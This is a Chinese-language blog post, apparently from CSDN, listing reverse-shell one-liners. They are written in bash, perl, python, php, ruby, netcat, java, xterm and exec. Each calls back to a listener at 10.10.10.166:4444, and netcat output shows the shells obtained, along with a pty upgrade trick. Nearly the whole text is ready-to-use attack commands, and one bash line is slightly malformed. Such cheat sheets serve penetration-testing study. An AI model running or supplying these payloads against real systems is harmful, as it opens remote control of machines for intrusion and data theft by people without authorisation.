10种反弹shell方式

版权声明:本文为博主原创连载文章,为了内容连贯性,未经博主允许不得转载。 https://blog.csdn.net/Kevinhanser/article/details/88920278

参考链接1:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
参考链接2:https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html

10种反弹shell方式


2019年3月30日【原创】

bash
perl
python
python
ruby
nc
java
xterm
exec
从原生的 shell 环境切换到 linux 的交互式 bash 环境

1. bash

bash -i >& /dev/tcp/10.10.10.166/44440>&1

# 返回的执行命令所在的用户 shell 环境
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39744
kevin@ubuntu:~$

2. perl

第一种方式:

perl -e 'use Socket;$i="10.10.10.166";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$

# 切换到交互式环境使用:python -c 'import pty; pty.spawn("/bin/bash")'
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39840
$ python -c 'import pty; pty.spawn("/bin/bash")' 
kevin@ubuntu:~$ 

第二种方式(linux):

kevin@ubuntu:/root$ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.166:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

第三种方式(windwos):

kevin@ubuntu:/root$ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

3. python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.166",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$ 

4. php

php -r '$sock=fsockopen("10.10.10.166",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$ 

5. ruby

第一种方式:

ruby -rsocket -e'f=TCPSocket.open("10.10.10.166",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)
# 一次性连接,连上就断,换上 msd 监听也是这样

第二种方式(linux):

kevin@ubuntu:~$ ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.10.10.166","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

第三种方式(windows)

ruby -rsocket -e 'c=TCPSocket.new("10.10.10.166","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

6. nc

nc -e /bin/bash 10.10.10.166 4444

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$ 

如果以上报错,则使用下面的方式:

# 运行报错:
kevin@ubuntu:~$ nc -e /bin/bash 10.10.10.166 4444
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.

# 方式二:
kevin@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.166 4444 >/tmp/f
rm: cannot remove '/tmp/f': No such file or directory

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$ 

7. java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.166/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
# 未验证

8. xterm

kevin@ubuntu:~$ xterm -display 10.10.10.166:4444
xterm: Xt error: Can't open display: 10.10.10.166:4444
# 报错,无法使用

9. exec

kevin@ubuntu:~$ exec 5<>/dev/tcp/10.10.10.166/4444
kevin@ubuntu:~$ cat <&5 | while read line; do $line 2>&5 >&5; done

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$ 

第二种方式:

kevin@ubuntu:~$ 0<&196;exec 196<>/dev/tcp/10.10.10.166/4444; sh <&196>&196 2>&196

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$ 

10. 从原生的 shell 环境切换到 linux 的交互式 bash 环境

root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39840
$ $ $ 
$ python -c 'import pty; pty.spawn("/bin/bash")'
kevin@ubuntu:~$ 
展开阅读全文

没有更多推荐了,返回首页